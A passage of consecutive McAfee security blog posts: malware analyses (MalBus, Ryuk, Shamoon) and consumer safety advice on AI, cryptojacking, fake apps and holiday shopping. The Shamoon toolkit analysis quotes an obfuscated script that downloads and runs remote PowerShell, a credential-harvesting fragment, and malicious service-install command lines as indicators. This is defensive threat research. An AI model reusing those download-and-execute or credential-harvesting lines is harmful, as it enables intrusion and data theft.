An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.


In addition to the Google phishing page, when “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojanwith different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of hardcoded C2 servers lookslike the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a normal trojan has. Downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains supported C2 commands:

Figure 15. C2 Commands

Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

Figure 16 Servers connected before entering command loop

Among these commands, directory indexing in particular is important. The directory structure is saved in a file named “” and while indexing the given path in the user device, it checks the file with specific keywords and if it matches, uploads the file to the remote upload server. These keywords are Korean and its translated English version is as per the following table:

Figure 17 Search file keywords

By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18 Keyword matching file upload server


Applications can easily trick users into installing them before then leaking sensitive information. Also, it is not uncommon to see malware sneaking onto the official Google Play store, making it hard for users to protect their devices. This malware has not been written for ordinary phishing attempts, but rather very targeted attacks, searching the victim’s devices for files related to the military and politics, likely trying to leak confidential information. Users should always install applications that they can fully trust even though they are downloaded from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit

Hashes (SHA-256)

Initial Downloader (APK)
• 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
• bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
• 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
• e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

Fake Plugin (APK)
• ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
• b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

Trojan (additional payload)
• b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
• 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
• 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
• 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

AI & Your Family: The Wows and Potential Risks

artificial intelligenceAm I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

An there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying on in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Cryptojacking RisingThink about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Cryptojacking RisingHere’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby when malware or site code is attached to drain unsuspecting users CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

Ryuk Ransomware Attack: Rush to Attribution Misses the Point

Senior analyst Ryan Sherstobitoff contributed to this report.

During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to link the attack to North Korea. Determining attribution was largely based on the fact that the Hermes ransomware has been used in the past by North Korean actors, and code blocks in Ryuk are similar to those in Hermes.

The McAfee Advanced Threat Research team has investigated this incident and determined how the malware works, how the attackers operate, and how to detect it. Based on the technical indicators, known cybercriminal characteristics, and evidence discovered on the dark web, our hypothesis is that the Ryuk attacks may not necessarily be backed by a nation-state, but rather share the hallmarks of a cybercrime operation.

How McAfee approaches attribution

Attribution is a critical part of any cybercrime investigation. However, technical evidence is often not enough to positively identify who is behind an attack because it does not provide all the pieces of the puzzle. Artifacts do not all appear at once; a new piece of evidence unearthed years after an attack can shine a different light on an investigation and introduce new challenges to current assumptions.

Ryuk attack: putting the pieces together

In October 2017, we investigated an attack on a Taiwanese bank. We discovered the actors used a clever tactic to distract the IT staff: a ransomware outbreak timed for the same moment that the thieves were stealing money. We used the term pseudo-ransomware to describe this attack. The malware was Hermes version 2.1.

One of the functions we often see in ransomware samples is that they will not execute if the victim’s system language is one of the following:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

That was October 2017. Searching earlier events, we noticed a posting from August 2017 in an underground forum in which a Russian-speaking actor offered the malware kit Hermes 2.1 ransomware:

What if the actor who attacked the Taiwanese bank simply bought a copy of Hermes and added it to the campaign to cause the distraction? Why go to the trouble to build something, when the actor can just buy the perfect distraction in an underground forum?

In the same underground forum thread we found a post from October 22, 2018, mentioning Ryuk.

This post contains a link to an article in the Russian security magazine (“Hacker”) discussing the emergence of Ryuk and how it was first discovered by MalwareHunterTeam in August 2018. This first appearance came well before last week’s attack on newspaper printing services.

Manga connection

Ryuk, according to Wikipedia, refers to a Japanese manga character from the series “Death Note.” Ryuk apparently drops a death note, a fitting name for ransomware that drops ransom notes.

Ransomware is typically named by its cybercriminal developer, as opposed to the naming of state-sponsored malware, which is mostly is done by the security industry. It seems the criminals behind Ryuk are into manga.

The use of manga character names and references is common in the cybercriminal scene. We often come across manga-inspired nicknames and avatars in underground forums.

Technical indicators

Looking at research from our industry peers comparing Ryuk and Hermes, we notice that the functionalities are generally equal. We agree that the actors behind Ryuk have access to the Hermes source code.

Let’s dive a bit deeper into Ryuk and compare samples over the last couple of months regarding compilation times and the presence of program database (PDB) paths:

We can see the PDB paths are almost identical. When we compare samples from August and December 2018 and focus on the checksum values of the executables’ rich headers, they are also identical.

From a call-flow perspective, we notice the similarities and evolution of the code:

The Hermes 2.1 ransomware kit, renamed and redistributed as Ryuk.

The author and seller of Hermes 2.1 emphasizes that he is selling is a kit and not a service. This suggests that a buyer of the kit must do some fine tuning by setting up a distribution method (spam, exploit kit, or RDP, for example) and infrastructure to make Hermes work effectively. If changing a name and ransom note are part of these tuning options, then it is likely that Ryuk is an altered version Hermes 2.1.

Attribution: analyzing competing hypotheses

In the race to determine who is behind an attack, research facts (the What and How questions) are often put aside to focus on attribution (the Who question). Who did it? This pursuit is understandable yet fundamentally flawed. Attribution is crucial, but there will always be unanswered questions. Our approach focuses on answering the What and How questions by analyzing the malware, the infrastructure involved, and the incident response performed at the victim’s site.

Our approach is always to analyze competing hypotheses. When investigating an incident, we form several views and compare all the artifacts to support these hypotheses. We try not only to seek verifying evidence but also actively try to find evidence that falsifies a hypothesis. Keeping our eyes open for falsifying facts and constantly questioning our results are essential steps to avoid conformation bias. By following this method, we find the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

Examining competing hypotheses is a scientific approach to investigating cyber incidents. It may not help with the race to attribution, but it ensures the output is based on available evidence.

The most likely hypothesis in the Ryuk case is that of a cybercrime operation developed from a tool kit offered by a Russian-speaking actor. From the evidence, we see sample similarities over the past several months that indicate a tool kit is being used. The actors have targeted several sectors and have asked a high ransom, 500 Bitcoin. Who is responsible? We do not know. But we do know how the malware works, how the attackers operate, and how to detect the threat. That analysis is essential because it allows us to serve our customers.

The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs.

The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube are often prone to links for fake websites and apps so criminals can make money off of downloads. Avoid falling victim to these frauds and only download software straight from a company’s home page.
  • Click with caution. Only click on links in text messages that are from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with the message.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use a robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Homeon Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Used to read a list of targeted computers created by the attackers. This tool is responsible to run the second tool, spreader.exe, with the list of each targeted machine.
  • Spreader.exe: Used to spread the file eraser in each machine previously set. It also gets information about the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.
  • SlHost.exe: The new wiper, which browses the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack


How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://

Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)


zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘*****.ps1’)‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}




With legitimate credentials to a network it is easy to login and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

This first component (OCLC.exe) reads two text files stored in two local directories. Directories “shutter” and “light” contain a list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find a file to erase, the malware uses function GetFullPath to get all paths.

It erases each folder and file.

The malware browses every file in every folder on the system.

To erase all files and folders, it first removes the “read only’ attributes to overwrite them.

It changes the creation, write, and access date and time to 01/01/3000 at 12:01:01 for each file.

The malware rewrites each file two times with random strings.

It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.

Then it uses FILE_DISPOSITION_INFORMATION to delete the files.

The function ProcessTracker has been coded to track the destruction.


In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.



The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise


  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service






The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some noticeable statistics jump out of the report.  In particular, the continued rise in cryptojacking, which has made an unexpected emergence over the course of a year. In Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats included one notable introduction in a disturbing category. In Q3 we saw two new exploit kits: Fallout and Underminer. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to easily and cheaply enter the digital crime business.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Shamoon Returns to Wipe Systems in Middle East, Europe

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims.

Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can take weeks or months, while resulting in unprofitability and diminished reputation.

Recent attacks have demonstrated how big the damage can be. Last year NotPetya affected several companies around the world. Last February, researchers uncovered OlympicDestroyer, which affected the Olympic Games organization.

Shamoon is destructive malware that McAfee has been monitoring since its appearance. The most recent wave struck early this month when the McAfee Foundstone Emergency Incident Response team reacted to a customer’s breach and identified the latest variant. Shamoon hit oil and gas companies in the Middle East in 2012 and resurfaced in 2016 targeting the same industry. This threat is critical for businesses; we recommend taking appropriate actions to defend your organizations.

During the past week, we have observed a new variant attacking several sectors, including oil, gas, energy, telecom, and government organizations in the Middle East and southern Europe.

Similar to the previous wave, Shamoon Version 3 uses several mechanisms as evasion techniques to bypass security as well to circumvent analysis and achieve its ends. However, its overall behavior remains the same as in previous versions, rendering detection straightforward for most antimalware engines.

As in previous variants, Shamoon Version 3 installs a malicious service that runs the wiper component. Once the wiper is running, it overwrites all files with random rubbish and triggers a reboot, resulting in a “blue screen of death” or a driver error and making the system inoperable. The variant can also enumerate the local network, but in this case does nothing with that information. This variant has some bugs, suggesting the possibility that this version is a beta or test phase.

The main differences from earlier versions are the name list used to drop the malicious file and the fabricated service name MaintenaceSrv (with “maintenance” misspelled). The wiping component has also been designed to target all files on the system with these options:

  • Overwrite file with garbage data (used in this version and the samples we analyzed)
  • Overwrite with a file (used in Shamoon Versions 1 and 2)
  • Encrypt the files and master boot record (not used in this version)

